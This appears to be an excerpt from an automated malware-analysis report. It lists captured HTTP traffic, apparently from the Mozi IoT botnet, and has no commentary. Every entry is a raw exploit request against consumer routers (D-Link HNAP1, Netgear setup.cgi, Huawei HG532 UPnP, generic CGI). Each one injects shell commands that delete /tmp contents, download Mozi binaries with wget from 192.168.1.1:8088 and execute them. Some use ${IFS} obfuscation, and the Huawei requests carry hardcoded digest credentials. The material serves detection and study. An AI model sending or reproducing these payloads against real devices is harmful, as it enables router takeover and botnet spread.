                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 152.117.85.253:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 164.98.152.87:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 215.149.25.71:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 169.80.247.56:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 92.35.9.7:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 31.124.239.80:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.174.53.247:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
